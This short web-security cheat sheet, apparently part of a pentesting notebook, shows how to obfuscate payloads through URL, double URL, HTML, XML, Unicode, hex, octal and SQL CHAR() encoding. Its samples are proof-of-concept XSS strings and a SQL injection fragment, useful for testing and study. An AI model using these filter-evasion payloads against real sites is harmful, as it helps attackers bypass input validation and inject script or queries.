Obfuscation
Last updated
Was this helpful?
Last updated
Was this helpful?
URL encoding:
[...]/?search=Fish+%26+Chips
Double URL encoding:
[...]/?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
HTML encoding:
<img src=x onerror="alert(1)">
<a href="javascript:alert(1)">Click me</a>
XML encoding:
<stockCheck>
<productId>
123
</productId>
<storeId>
999 SELECT * FROM information_schema.tables
</storeId>
</stockCheck>
Unicode encoding:
eval("\u0061lert(1)")
<a href="javascript\u{0000000003a}alert(1)">Click me</a>
Hex escaping:
eval("\x61lert")
Octal escaping:
eval("\141lert(1)")
Multiple encodings:
<a href="javascript:\u0061lert(1)">Click me</a>
Browser will first HTML decode \
to \
- turning u0061
into the unicode escape \u0061
decoding into a
.
SQL char() function:
CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
Decoded to SELECT